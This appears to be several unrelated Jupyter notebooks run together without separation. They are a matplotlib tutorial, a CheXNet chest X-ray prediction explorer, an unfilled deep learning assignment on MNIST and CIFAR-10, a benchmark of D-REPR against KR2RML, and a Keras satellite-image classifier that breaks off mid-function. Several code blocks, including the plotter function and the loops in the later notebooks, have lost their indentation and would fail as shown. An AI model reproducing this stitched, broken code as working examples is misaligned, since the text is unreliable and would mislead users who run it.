> *© 2021, Joris Van den Bossche and Stijn Van Hoey (<mailto:jorisvandenbossche@gmail.com>, <mailto:stijnvanhoey@gmail.com>). Licensed under [CC BY 4.0 Creative Commons](http://creativecommons.org/licenses/by/4.0/)*
---
# Matplotlib
[Matplotlib](http://matplotlib.org/) is a Python package used widely throughout the scientific Python community to produce high quality 2D publication graphics. It transparently supports a wide range of output formats including PNG (and other raster formats), PostScript/EPS, PDF and SVG and has interfaces for all of the major desktop GUI (graphical user interface) toolkits. It is a great package with lots of options.
However, matplotlib is...
> The 800-pound gorilla — and like most 800-pound gorillas, this one should probably be avoided unless you genuinely need its power, e.g., to make a **custom plot** or produce a **publication-ready** graphic.
> (As we’ll see, when it comes to statistical visualization, the preferred tack might be: “do as much as you easily can in your convenience layer of choice [nvdr e.g. directly from Pandas, or with seaborn], and then use matplotlib for the rest.”)
(quote used from [this](https://dansaber.wordpress.com/2016/10/02/a-dramatic-tour-through-pythons-data-visualization-landscape-including-ggplot-and-altair/) blogpost)
And that's what we mostly did: just use the `.plot` function of Pandas. So why learn matplotlib? Well, for the *...then use matplotlib for the rest* part; at some point, somehow!
Matplotlib comes with a convenience sub-package called ``pyplot`` which, for consistency with the wider matplotlib community, should always be imported as ``plt``:
```
import numpy as np
import matplotlib.pyplot as plt
```
## - dry stuff - The matplotlib `Figure`, `axes` and `axis`
At the heart of **every** plot is the figure object. The "Figure" object is the top level concept which can be drawn to one of the many output formats, or simply just to screen. Any object which can be drawn in this way is known as an "Artist" in matplotlib.
Let's create our first artist using pyplot, and then show it:
```
fig = plt.figure()
plt.show()
```
On its own, drawing the figure artist is uninteresting and will result in an empty piece of paper (that's why we didn't see anything above).
By far the most useful artist in matplotlib is the **Axes** artist. The Axes artist represents the "data space" of a typical plot, a rectangular axes (the most common, but not always the case, e.g. polar plots) will have 2 (confusingly named) **Axis** artists with tick labels and tick marks.

There is no limit on the number of Axes artists which can exist on a Figure artist. Let's go ahead and create a figure with a single Axes artist, and show it using pyplot:
```
ax = plt.axes()
type(ax)
type(ax.xaxis), type(ax.yaxis)
```
Matplotlib's ``pyplot`` module makes the process of creating graphics easier by allowing us to skip some of the tedious Artist construction. For example, we did not need to manually create the Figure artist with ``plt.figure`` because it was implicit that we needed a figure when we created the Axes artist.
Under the hood matplotlib still had to create a Figure artist; it's just that we didn't need to capture it in a variable.
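That implicitly created Figure artist is still reachable via `plt.gcf()` ("get current figure"); a small sketch (the `Agg` backend is only an assumption so this also runs headless):

```python
import matplotlib
matplotlib.use('Agg')  # non-interactive backend, assumption for headless execution
import matplotlib.pyplot as plt

ax = plt.axes()   # implicitly creates a Figure artist...
fig = plt.gcf()   # ...which we can still get hold of afterwards
print(fig is ax.figure)  # True
```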
## - essential stuff - `pyplot` versus Object based
Some example data:
```
x = np.linspace(0, 5, 10)
y = x ** 2
```
Observe the following difference:
**1. pyplot style: plt...** (you will see this a lot for code online!)
```
plt.plot(x, y, '-')
```
**2. creating objects**
```
fig, ax = plt.subplots()
ax.plot(x, y, '-')
```
Although a little bit more code is involved, the advantage is that we now have **full control** of where the plot axes are placed, and we can easily add more than one axis to the figure:
```
fig, ax1 = plt.subplots()
ax1.plot(x, y, '-')
ax1.set_ylabel('y')
ax2 = fig.add_axes([0.2, 0.5, 0.4, 0.3]) # inset axes
ax2.set_xlabel('x')
ax2.plot(x, y*2, 'r-')
```
<div class="alert alert-info" style="font-size:18px">
<b>REMEMBER</b>:
<ul>
<li>Use the <b>object oriented</b> power of Matplotlib!</li>
<li>Get yourself used to writing <code>fig, ax = plt.subplots()</code></li>
</ul>
</div>
```
fig, ax = plt.subplots()
ax.plot(x, y, '-')
# ...
```
## A small cheat-sheet reference for some common elements
```
x = np.linspace(-1, 0, 100)
fig, ax = plt.subplots(figsize=(10, 7))
# Adjust the created axes so that its topmost extent is 0.9 of the figure.
fig.subplots_adjust(top=0.9)
ax.plot(x, x**2, color='0.4', label='power 2')
ax.plot(x, x**3, color='0.8', linestyle='--', label='power 3')
ax.vlines(x=-0.75, ymin=0., ymax=0.8, color='0.4', linestyle='-.')
ax.axhline(y=0.1, color='0.4', linestyle='-.')
ax.fill_between(x=[-1, 1.1], y1=[0.65], y2=[0.75], color='0.85')
fig.suptitle('Figure title', fontsize=18,
fontweight='bold')
ax.set_title('Axes title', fontsize=16)
ax.set_xlabel('The X axis')
ax.set_ylabel('The Y axis $y=f(x)$', fontsize=16)
ax.set_xlim(-1.0, 1.1)
ax.set_ylim(-0.1, 1.)
ax.text(0.5, 0.2, 'Text centered at (0.5, 0.2)\nin data coordinates.',
horizontalalignment='center', fontsize=14)
ax.text(0.5, 0.5, 'Text centered at (0.5, 0.5)\nin Figure coordinates.',
horizontalalignment='center', fontsize=14,
transform=ax.transAxes, color='grey')
ax.legend(loc='upper right', frameon=True, ncol=2, fontsize=14)
```
Adjusting specific parts of a plot is a matter of accessing the correct element of the plot:

For more information on legend positioning, check [this post](http://stackoverflow.com/questions/4700614/how-to-put-the-legend-out-of-the-plot) on stackoverflow!
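A recurring pattern from that post is anchoring the legend outside the axes with `bbox_to_anchor`; a minimal sketch (the `Agg` backend is only an assumption so this also runs headless):

```python
import matplotlib
matplotlib.use('Agg')  # non-interactive backend, assumption for headless execution
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(0, 5, 10)
fig, ax = plt.subplots()
ax.plot(x, x**2, label='power 2')
ax.plot(x, x**3, label='power 3')

# Place the legend just outside the upper-right corner of the axes
ax.legend(loc='upper left', bbox_to_anchor=(1.02, 1.0))
plt.show()
```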
## I do not like the style...
**...understandable**
Matplotlib had a bad reputation in terms of its default styling as figures created with earlier versions of Matplotlib were very Matlab-lookalike and mostly not really catchy.
Since Matplotlib 2.0, this has changed: https://matplotlib.org/users/dflt_style_changes.html!
However...
> *Des goûts et des couleurs, on ne discute pas...*
(check [this link](https://fr.wiktionary.org/wiki/des_go%C3%BBts_et_des_couleurs,_on_ne_discute_pas) if you're not french-speaking)
To account for different tastes, Matplotlib provides a number of styles that can be used to quickly change a number of settings:
```
plt.style.available
x = np.linspace(0, 10)
with plt.style.context('seaborn'):  # 'seaborn', 'ggplot', 'bmh', 'grayscale', 'seaborn-whitegrid', 'seaborn-muted'
    fig, ax = plt.subplots()
    ax.plot(x, np.sin(x) + x + np.random.randn(50))
    ax.plot(x, np.sin(x) + 0.5 * x + np.random.randn(50))
    ax.plot(x, np.sin(x) + 2 * x + np.random.randn(50))
```
We should not start a discussion about colors and styles here; just pick **your favorite style**!
```
plt.style.use('seaborn-whitegrid')
```
or go all the way and define your own custom style, see the [official documentation](https://matplotlib.org/3.1.1/tutorials/introductory/customizing.html) or [this tutorial](https://colcarroll.github.io/yourplotlib/#/).
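Between a named style and a full custom style file, `plt.rc_context` lets you override a handful of rcParams temporarily; a small sketch (the `Agg` backend is only an assumption so this also runs headless):

```python
import matplotlib
matplotlib.use('Agg')  # non-interactive backend, assumption for headless execution
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(0, 10)

# The overrides apply only inside the with-block and are restored afterwards
with plt.rc_context({'axes.grid': True, 'lines.linewidth': 3}):
    fig, ax = plt.subplots()
    ax.plot(x, np.sin(x))
```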
<div class="alert alert-info">
<b>REMEMBER</b>:
<ul>
<li>If you just want <b>quickly a good-looking plot</b>, use one of the available styles (<code>plt.style.use('...')</code>)</li>
<li>Otherwise, the object-oriented way of working makes it possible to change everything!</li>
</ul>
</div>
## Interaction with Pandas
What we have been doing while plotting with Pandas:
```
import pandas as pd
flowdata = pd.read_csv('data/vmm_flowdata.csv',
index_col='Time',
parse_dates=True)
out = flowdata.plot() # print type()
```
Under the hood, it creates a Matplotlib Figure with an Axes object.
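You can check this by capturing what Pandas returns; a sketch with a small synthetic DataFrame, so it does not depend on the flowdata file (the `Agg` backend is only an assumption so this also runs headless):

```python
import matplotlib
matplotlib.use('Agg')  # non-interactive backend, assumption for headless execution
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd

df = pd.DataFrame({'A': np.arange(10), 'B': np.arange(10) ** 2})

ax = df.plot()          # Pandas hands back the Matplotlib Axes...
fig = ax.get_figure()   # ...from which the enclosing Figure is reachable
print(type(ax).__name__, type(fig).__name__)
```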
### Pandas versus matplotlib
#### Comparison 1: single plot
```
flowdata.plot(figsize=(16, 6)) # SHIFT + TAB this!
```
Making this with matplotlib...
```
fig, ax = plt.subplots(figsize=(16, 6))
ax.plot(flowdata)
ax.legend(["L06_347", "LS06_347", "LS06_348"])
```
is still ok!
#### Comparison 2: with subplots
```
axs = flowdata.plot(subplots=True, sharex=True,
figsize=(16, 8), colormap='viridis', # Dark2
fontsize=15, rot=0)
```
Mimicking this in matplotlib (just as a reference, it is basically what Pandas is doing under the hood):
```
from matplotlib import cm
import matplotlib.dates as mdates
colors = [cm.viridis(x) for x in np.linspace(0.0, 1.0, len(flowdata.columns))] # list comprehension to set up the colors
fig, axs = plt.subplots(3, 1, figsize=(16, 8))
for ax, col, station in zip(axs, colors, flowdata.columns):
    ax.plot(flowdata.index, flowdata[station], label=station, color=col)
    ax.legend()
    if not ax.get_subplotspec().is_last_row():
        ax.xaxis.set_ticklabels([])
        ax.xaxis.set_major_locator(mdates.YearLocator())
    else:
        ax.xaxis.set_major_locator(mdates.YearLocator())
        ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y'))
        ax.set_xlabel('Time')
    ax.tick_params(labelsize=15)
```
...is already a bit harder ;-)
### Best of both worlds...
```
fig, ax = plt.subplots() #prepare a Matplotlib figure
flowdata.plot(ax=ax) # use Pandas for the plotting
fig, ax = plt.subplots(figsize=(15, 5)) #prepare a matplotlib figure
flowdata.plot(ax=ax) # use pandas for the plotting
# Provide further adaptations with matplotlib:
ax.set_xlabel("")
ax.grid(which="major", linewidth='0.5', color='0.8')
fig.suptitle('Flow station time series', fontsize=15)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16, 6)) #provide with matplotlib 2 axis
flowdata[["L06_347", "LS06_347"]].plot(ax=ax1) # plot the two timeseries of the same location on the first plot
flowdata["LS06_348"].plot(ax=ax2, color='0.2') # plot the other station on the second plot
# further adapt with matplotlib
ax1.set_ylabel("L06_347")
ax2.set_ylabel("LS06_348")
ax2.legend()
```
<div class="alert alert-info">
<b>Remember</b>:
<ul>
<li>You can do anything with matplotlib, but at a cost... <a href="http://stackoverflow.com/questions/tagged/matplotlib">stackoverflow</a></li>
<li>The preformatting of Pandas mostly provides enough flexibility for quick analysis and draft reporting, but not for publication-ready figures or heavy customization</li>
</ul>
<br>
If you take the time to make your perfect/spot-on/greatest-ever matplotlib-figure: Make it a <b>reusable function</b>!
</div>
An example of such a reusable function to plot data:
```
%%file plotter.py
#this writes a file in your directory, check it(!)
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib import cm
from matplotlib.ticker import MaxNLocator
def vmm_station_plotter(flowdata, label="flow (m$^3$s$^{-1}$)"):
colors = [cm.viridis(x) for x in np.linspace(0.0, 1.0, len(flowdata.columns))] # list comprehension to set up the color sequence
fig, axs = plt.subplots(3, 1, figsize=(16, 8))
for ax, col, station in zip(axs, colors, flowdata.columns):
ax.plot(flowdata.index, flowdata[station], label=station, color=col) # this plots the data itself
ax.legend(fontsize=15)
ax.set_ylabel(label, size=15)
ax.yaxis.set_major_locator(MaxNLocator(4)) # smaller set of y-ticks for clarity
if not ax.get_subplotspec().is_last_row(): # hide the xticklabels from the none-lower row x-axis
ax.xaxis.set_ticklabels([])
ax.xaxis.set_major_locator(mdates.YearLocator())
else: # yearly xticklabels from the lower x-axis in the subplots
ax.xaxis.set_major_locator(mdates.YearLocator())
ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y'))
ax.tick_params(axis='both', labelsize=15, pad=8) # enlarge the ticklabels and increase distance to axis (otherwise overlap)
return fig, axs
from plotter import vmm_station_plotter
# fig, axs = vmm_station_plotter(flowdata)
fig, axs = vmm_station_plotter(flowdata,
label="NO$_3$ (mg/l)")
fig.suptitle('Ammonium concentrations in the Maarkebeek', fontsize='17')
fig.savefig('ammonium_concentration.pdf')
```
<div class="alert alert-warning">
**NOTE**
- Let your hard work pay off, write your own custom functions!
</div>
<div class="alert alert-info" style="font-size:18px">
**Remember**
`fig.savefig()` to save your Figure object!
</div>
# Need more matplotlib inspiration?
For more in-depth material:
* http://www.labri.fr/perso/nrougier/teaching/matplotlib/
* notebooks in matplotlib section: http://nbviewer.jupyter.org/github/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/Index.ipynb#4.-Visualization-with-Matplotlib
* main reference: [matplotlib homepage](http://matplotlib.org/)
<div class="alert alert-info" style="font-size:18px">
**Remember**
- <a href="https://matplotlib.org/stable/gallery/index.html">matplotlib gallery</a> is an important resource to start from
- Matplotlib has some great [cheat sheets](https://github.com/matplotlib/cheatsheets) available
</div>
# Reproduce CheXNet: Explore Predictions
## Import other modules and pandas
```
import visualize_prediction as V
import pandas as pd
#suppress pytorch warnings about source code changes
import warnings
warnings.filterwarnings('ignore')
```
## Settings for review
We can examine individual results in more detail, seeing probabilities of disease for test images.
We get you started with a small number of the images from the large NIH dataset.
To explore the full dataset, [download images from NIH (large, ~40gb compressed)](https://nihcc.app.box.com/v/ChestXray-NIHCC), extract all tar.gz files to a single folder, place that path below and set STARTER_IMAGES=False
```
STARTER_IMAGES=False
PATH_TO_IMAGES = "/home/frank_li_zhou/images/images/"
#STARTER_IMAGES=False
#PATH_TO_IMAGES = "your path to NIH data here"
```
Load pretrained model (part of cloned repo; should not need to change path unless you want to point to one you retrained)
```
PATH_TO_MODEL = "/home/frank_li_zhou/reproduce-chexnet/pretrained/checkpoint"
```
Pick the finding you want to see positive examples of:
LABEL can be set to any of:
- Atelectasis
- Cardiomegaly
- Consolidation
- Edema
- Effusion
- Emphysema
- Fibrosis
- Hernia
- Infiltration
- Mass
- Nodule
- Pleural_Thickening
- Pneumonia
- Pneumothorax
```
LABEL="Cardiomegaly"
```
When initially exploring, it's more interesting to see cases positive for the pathology of interest:
```
POSITIVE_FINDINGS_ONLY=True
```
## Load data
This loads up dataloader and model (note: only test images not used for model training are loaded).
```
dataloader,model= V.load_data(PATH_TO_IMAGES,LABEL,PATH_TO_MODEL,POSITIVE_FINDINGS_ONLY,STARTER_IMAGES)
print("Cases for review:")
print(len(dataloader))
```
## Examine individual cases
To explore, run code below to see a random case positive for your selected finding, a heatmap indicating the most influential regions of the image, and the model's estimated probabilities for findings. For many diagnoses, you can see that the model uses features outside the expected region to calibrate its predictions -- [you can read my discussion about this here](https://medium.com/@jrzech/what-are-radiological-deep-learning-models-actually-learning-f97a546c5b98).
Please note that:
1) the NIH dataset was noisily labeled by automatically extracting labels from text reports written by radiologists, as described in paper [here](https://arxiv.org/pdf/1705.02315.pdf) and analyzed [here](https://lukeoakdenrayner.wordpress.com/2017/12/18/the-chestxray14-dataset-problems/), so we should not be surprised to see inaccuracies in the provided ground truth labels
2) high AUCs can be achieved even if many positive cases are assigned absolutely low probabilities of disease, as AUC depends on the relative ranking of probabilities between cases.
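The second point is easy to verify: AUC only looks at how cases are *ranked*, so shrinking all predicted probabilities toward zero leaves it unchanged. A small rank-based AUC computation (plain NumPy, independent of this repo's code, with made-up labels and scores) illustrates that:

```
import numpy as np

def auc_from_ranks(y_true, scores):
    """Mann-Whitney formulation of AUC: the probability that a random
    positive case is scored higher than a random negative case."""
    pos = scores[y_true == 1]
    neg = scores[y_true == 0]
    # compare every positive against every negative; ties count as 0.5
    greater = (pos[:, None] > neg[None, :]).sum()
    ties = (pos[:, None] == neg[None, :]).sum()
    return (greater + 0.5 * ties) / (len(pos) * len(neg))

y = np.array([0, 0, 1, 0, 1, 1])
p = np.array([0.01, 0.02, 0.03, 0.015, 0.05, 0.04])  # all "absolutely low"
print(auc_from_ranks(y, p))        # → 1.0 despite tiny probabilities
print(auc_from_ranks(y, p / 100))  # → 1.0 again: only the ranking matters
```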
You can run the below cell repeatedly to see different examples:
```
preds=V.show_next(dataloader,model, LABEL)
preds
```
# Assignment 1
#### Student ID: *Double click here to fill the Student ID*
#### Name: *Double click here to fill the name*
## Q1: Exploring the TensorFlow playground
http://playground.tensorflow.org/
(a) Execute the following steps first:
1. Change the dataset to exclusive OR dataset (top-right dataset under "DATA" panel).
2. Reduce the network to a single hidden layer and change the activation function to "ReLU".
3. Run the model five times. Before each trial, hit the "Reset the network" button to get a new random initialization. (The "Reset the network" button is the circular reset arrow just to the left of the Play button.)
4. Let each trial run for at least 500 epochs to ensure convergence.
Make some comments about the role of initialization in this non-convex optimization problem. What is the minimum number of neurons required (keeping all other parameters unchanged) to ensure that it almost always converges to a global minimum (where the test loss is below 0.02)? Finally, paste the convergence results below.
* Note the convergence results should include all the settings and the model. An example is available [here](https://drive.google.com/file/d/15AXYZLNMNnpZj0kI0CgPdKnyP_KqRncz/view?usp=sharing)
<!-- Your answer here. -->
(b) Execute the following steps first
1. Change the dataset to be the spiral (bottom-right dataset under "DATA" panel).
2. Increase the noise level to 50 and leave the training and test set ratio unchanged.
3. Train the best model you can, using just `X1` and `X2` as input features. Feel free to add or remove layers and neurons. You can also change learning settings like learning rate, regularization rate, activations and batch size. Try to get the test loss below 0.15.
How many parameters do you have in your models? Describe the model architecture and the training strategy you use. Finally, paste the convergence results below.
* You may need to train the model for enough epochs here and use learning rate scheduling manually
<!-- Your answer here. -->
(c) Use the same dataset as described above with noise level set to 50.
This time, feel free to add additional features or other transformations like `sin(X1)` and `sin(X2)`. Again, try to get the loss below 0.15.
Compare the results with (b) and describe your observation. Describe the model architecture and the training strategy you use. Finally, paste the convergence results below.
<!-- Your answer here. -->
## Q2: Tackling MNIST with DNN
In this question, we will explore the behavior of the vanishing gradient problem (which we have tried to solve using feature engineering in Q1) and try to solve it. The dataset we use is the famous MNIST dataset which contains ten different classes of handwritten digits. The MNIST database contains 60,000 training images and 10,000 testing images. In addition, each grayscale image is fit into a 28x28 pixel bounding box.
http://yann.lecun.com/exdb/mnist/
(a) Load the MNIST dataset (you may refer to `keras.datasets.mnist.load_data()`), and split it into a training set (48,000 images), a validation set (12,000 images) and a test set (10,000 images). Make sure to standardize the dataset first.
```
# coding your answer here.
```
(b) Build a sequential model with 30 hidden dense layers (60 neurons each using ReLU as the activation function) plus an output layer (10 neurons using softmax as the activation function). Train it with SGD optimizer with learning rate 0.001 and momentum 0.9 for 10 epochs on MNIST dataset.
Try to manually calculate how many steps are in one epoch and compare it with the one reported by the program. Finally, plot the learning curves (loss vs epochs) and report the accuracy you get on the test set.
```
# coding your answer here.
```
(c) Update the model in (b) to add a BatchNormalization (BN) layer after every hidden layer's activation functions.
How do the training time and the performance compare with (b)? Try to manually calculate how many non-trainable parameters are in your model and compare it with the one reported by the program. Finally, try moving the BN layers before the hidden layers' activation functions and compare the performance with BN layers after the activation function.
```
# coding your answer here.
```
## Q3: High Accuracy CNN for CIFAR-10
When facing problems related to images like Q2, we can consider using CNN instead of DNN. The CIFAR-10 dataset is one of the most widely used datasets for machine learning research. It consists of 60000 32x32 color images in 10 classes, with 6000 images per class. In this problem, we will try to build our own CNN from scratch and achieve the highest possible accuracy on CIFAR-10.
https://www.cs.toronto.edu/~kriz/cifar.html
(a) Load the CIFAR10 dataset (you may refer to `keras.datasets.cifar10.load_data()`), and split it into a training set (40,000 images), a validation set (10,000 images) and a test set (10,000 images). Make sure the pixel values range from 0 to 1.
```
# coding your answer here.
```
(b) Build a Convolutional Neural Network using the following architecture:
| | Type | Maps | Activation |
|--------|---------------------|---------|------------|
| Output | Fully connected | 10 | Softmax |
| S10 | Max Pooling | | |
| B9 | Batch normalization | | |
| C8 | Convolution | 64 | ReLU |
| B7 | Batch normalization | | |
| C6 | Convolution | 64 | ReLU |
| S5 | Max Pooling | | |
| B4 | Batch normalization | | |
| C3 | Convolution | 32 | ReLU |
| B2 | Batch normalization | | |
| C1 | Convolution | 32 | ReLU |
| In | Input | RGB (3) | |
Train the model for 20 epochs with NAdam optimizer (Adam with Nesterov momentum).
Try to manually calculate the number of parameters in your model's architecture and compare it with the one reported by `summary()`. Finally, plot the learning curves and report the accuracy on the test set.
```
# coding your answer here.
```
(c) Looking at the learning curves, you can see that the model is overfitting. Add a data augmentation stage to the model in (b) as follows.
* Applies random horizontal flipping
* Rotates the input images by a random value in the range `[–18 degrees, +18 degrees]`
* Zooms in or out of the image by a random factor in the range `[-15%, +15%]`
* Randomly chooses a location to crop images down to a target size `[30, 30]`
* Randomly adjusts the contrast of images by a factor in the range `[0.9, 1.1]`, so the result is slightly darker or brighter than the original
Fit your model for enough epochs (60, for instance) and compare its performance and learning curves with the previous model in (b). Finally, report the accuracy on the test set.
```
# coding your answer here.
```
(d) Replace all the convolution layers in (b) with depthwise separable convolution layers (except the first convolution layer).
Try to manually calculate the number of parameters in your model's architecture and compare it with the one reported by `summary()`. Fit your model and compare its performance with the previous model in (c). Finally, plot the learning curves and report the accuracy on the test set.
```
# coding your answer here.
```
#### The purpose of this notebook is to compare D-REPR with other methods such as KR2RML and R2RML in terms of performance
```
import re, numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm_notebook as tqdm
%matplotlib inline
plt.rcParams["figure.figsize"] = (10.0, 8.0) # set default size of plots
plt.rcParams["image.interpolation"] = "nearest"
plt.rcParams["image.cmap"] = "gray"
%load_ext autoreload
%autoreload 2
%reload_ext autoreload
def read_exec_time(log_file: str, tag_str: str='>>> [DREPR]', print_exec_time: bool=True):
    """Read the execution time of the program from its log file"""
    with open(log_file, "r") as f:
        for line in f:
            if line.startswith(tag_str):  # use the tag argument instead of a hard-coded prefix
                m = re.search("((?:\d+\.)?\d+) ?ms", line)
                exec_time = m.group(1)
                if print_exec_time:
                    print(line.strip(), "-- extracted exec_time:", exec_time)
                return float(exec_time)
    raise Exception("Did not find any timing output message")
```
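As a quick sanity check of the parsing logic above, and of the `((?:\d+\.)?\d+) ?ms` pattern in particular, the regex can be exercised on a sample log line (the timing value here is made up):

```
import re

# a line in the shape the patched Karma code prints
line = ">>> [DREPR] Finish converting RDF after 1234.5ms"
m = re.search(r"((?:\d+\.)?\d+) ?ms", line)
exec_time = float(m.group(1))
print(exec_time)  # → 1234.5

# the optional space before "ms" is also handled
m2 = re.search(r"((?:\d+\.)?\d+) ?ms", ">>> [DREPR] done after 250 ms")
```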
#### KR2RML
To set up KR2RML, we first need to download Web-Karma-2.2 from the web and modify the file `karma-offline/src/main/java/edu/isi/karma/rdf/OfflineRdfGenerator`, adding this code at line 184: `System.out.println(">>> [DREPR] Finish converting RDF after " + String.valueOf(System.currentTimeMillis() - l) + "ms");` so that the runtime is printed to stdout.
Then run `mvn install -Dmaven.test.skip=true` at the root directory to install dependencies before actually converting data to RDF.
```
%cd /workspace/tools-evaluation/Web-Karma-2.2/karma-offline
DATA_FILE = "/workspace/drepr/drepr/rdrepr/data/insurance.csv"
MODEL_FILE = "/workspace/drepr/drepr/rdrepr/data/insurance.level-0.model.ttl"
OUTPUT_FILE = "/tmp/kr2rml_output.ttl"
karma_exec_times = []
for i in tqdm(range(3)):
!mvn exec:java -Dexec.mainClass="edu.isi.karma.rdf.OfflineRdfGenerator" -Dexec.args=" \
--sourcetype CSV \
--filepath \"{DATA_FILE}\" \
--modelfilepath \"{MODEL_FILE}\" \
--sourcename test \
--outputfile {OUTPUT_FILE}" -Dexec.classpathScope=compile > /tmp/karma_speed_comparison.log
karma_exec_times.append(read_exec_time("/tmp/karma_speed_comparison.log"))
!rm /tmp/karma_speed_comparison.log
print(f"run 3 times, average: {np.mean(karma_exec_times)}ms")
```
<hr />
Report information about the output and input
```
with open(DATA_FILE, "r") as f:
n_records = sum(1 for _ in f) - 1
print("#records:", n_records, f"({round(n_records * 1000 / np.mean(karma_exec_times), 2)} records/s)")
with open(OUTPUT_FILE, "r") as f:
n_triples = sum(1 for line in f if line.strip().endswith("."))
print("#triples:", n_triples, f"({round(n_triples * 1000 / np.mean(karma_exec_times), 2)} triples/s)")
```
#### MorphRDB
Assuming that you have followed their [installation guide](https://github.com/oeg-upm/morph-rdb/wiki/Installation) and [usage instructions](https://github.com/oeg-upm/morph-rdb/wiki/Usage#csv-files), we are going to create R2RML mappings and invoke their program to map data into RDF.
```
%cd /workspace/tools-evaluation/morph-rdb/morph-examples
!java -cp .:morph-rdb-dist-3.9.17.jar:dependency/\* es.upm.fi.dia.oeg.morph.r2rml.rdb.engine.MorphCSVRunner /workspace/drepr/drepr/rdrepr/data insurance.level-0.morph.properties
```
#### DREPR
```
%cd /workspace/drepr/drepr/rdrepr
DREPR_EXEC_LOG = "/tmp/drepr_exec_log.log"
!cargo run --release > {DREPR_EXEC_LOG}
drepr_exec_times = read_exec_time(DREPR_EXEC_LOG)
!rm {DREPR_EXEC_LOG}
with open("/tmp/drepr_output.ttl", "r") as f:
n_triples = sum(1 for line in f if line.strip().endswith("."))
print("#triples:", n_triples, f"({round(n_triples * 1000 / np.mean(drepr_exec_times), 2)} triples/s)")
```
```
#Importing necessary libraries
import keras
import numpy as np
import pandas as pd
from keras.applications import VGG16, inception_v3, resnet50, mobilenet
from keras import models
from keras import layers
from keras import optimizers
from sklearn.metrics import classification_report, confusion_matrix
import matplotlib.pyplot as plt
import os
import glob
import tifffile as tif
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
from tempfile import TemporaryFile
from sklearn import model_selection
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l1
# dataset
dataset = []
paths = []
labels = []
input_size = 64
num_channel = 13
# getting paths of stored images
def read_files(path):
for dirpath, dirnames, filenames in os.walk(path):
#print('Current path: ', dirpath)
#print('Directories: ', dirnames)
#print('Files: ', filenames)
#print(dirpath)
#os.chdir(dirpath)
paths.append(dirpath)
read_files('/home/sachin_sharma/Desktop/exp2_tif')
paths.sort()
paths = paths[1:]
file_names = []
print(paths)
# Converting 13 channel images to np array
def img_array(paths):
print('{}'.format(paths))
os.chdir('{}'.format(paths))
for file in glob.glob("*.tif"):
#print('name of file: '+ file)
file_names.append(file)
x = tif.imread('{}'.format(file))
basename, ext = os.path.splitext(file)
labels.append(basename)
x = np.resize(x, (64, 64, 13))
dataset.append(x)
#calling
for pths in paths:
img_array(pths)
# lets see the shape of random element in a dataset
print(dataset[400].shape)
# Getting the list of max pixel value in each image
""""max_pixel_val = []
def max_pixel(data):
max_pixel_val.append(np.amax(data))
# calling
for data in dataset:
max_pixel(data)"""
"""# max of all pixel values
max_all_pixel_value = max(max_pixel_val)
print('max pixel value from all 13 band images: ',max_all_pixel_value)"""
# Normalizing
"""X_nparray = np.array(dataset).astype(np.float64)
X_mean = np.mean(X_nparray, axis=(0,1,2))
X_std = np.std(X_nparray, axis=(0,1,2))
X_nparray -= X_mean
X_nparray /= X_std
print(X_nparray.shape)
print(X_mean.shape)"""
X_nparray = np.array(dataset)
#print(type(X_mean))
#print(X_mean)  # X_mean/X_std only exist when the normalization block above is enabled
#print(X_std)
print(np.mean(X_nparray, axis=(0,1,2)))
#print(np.std(X_nparray, axis=(0,1,2)))
# label encoding
lbl_encoder = LabelEncoder()
ohe = OneHotEncoder()
# assigning labels to each image
labels_1 = []
for l in labels:
labels_1.append(l.split("_")[0])
lbl_list = lbl_encoder.fit_transform(labels_1)
Y = ohe.fit_transform(lbl_list.reshape(-1,1)).toarray().astype(int)
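# Sanity check (illustrative, hand-made labels): a fresh encoder pair shows
# what the LabelEncoder + OneHotEncoder pipeline above produces: integer
# codes in alphabetical order, then one one-hot column per distinct class.
from sklearn.preprocessing import LabelEncoder, OneHotEncoder  # already imported above; repeated so this snippet stands alone
demo_lbl = LabelEncoder().fit_transform(['Residential', 'Else', 'Industrial'])
print(demo_lbl)  # Else -> 0, Industrial -> 1, Residential -> 2
demo_ohe = OneHotEncoder().fit_transform(demo_lbl.reshape(-1, 1)).toarray().astype(int)
print(demo_ohe)  # one row per sample, one column per class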
# labels
print(Y[21500])
# splitting the dataset into training set test set
train_data, test_data, train_labels, test_labels = model_selection.train_test_split(X_nparray, Y, test_size = 0.4, random_state = 0)
# Trained data shape
print(train_data.shape)
# test data shape
print(test_data.shape)
# train labels shape
print(train_labels.shape)
# some first 10 hot encodings
print(train_labels[:10])
# test label shape
print(test_labels.shape)
# hyperparameters
batch_size = 50
num_classes = 3
epochs = 20
input_shape = (input_size, input_size, num_channel)
l1_lambda = 0.00003
# model
model = Sequential()
model.add(BatchNormalization(input_shape=input_shape))
model.add(Conv2D(64, (2,2), kernel_regularizer=l1(l1_lambda), activation='relu'))  # kernel_regularizer is the Keras 2 name for W_regularizer
model.add(Conv2D(64, (2,2), kernel_regularizer=l1(l1_lambda), activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
opt = keras.optimizers.Adam()
model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])
# fitting model
history = model.fit(train_data, train_labels,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(test_data, test_labels),
)
# saving the model
os.chdir('/home/sachin_sharma/Desktop')
model.save('exp2_c1.h5')
# scores
score = model.evaluate(test_data, test_labels, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# Confusion Matrix and Classification report
Y_pred = model.predict(test_data)
y_pred = np.argmax(Y_pred, axis=1) # predictions
print('Confusion Matrix')
cm = confusion_matrix(test_labels.argmax(axis=1), y_pred)
#print(cm)
def cm2df(cm, labels):
df = pd.DataFrame()
# rows
for i, row_label in enumerate(labels):
rowdata={}
# columns
for j, col_label in enumerate(labels):
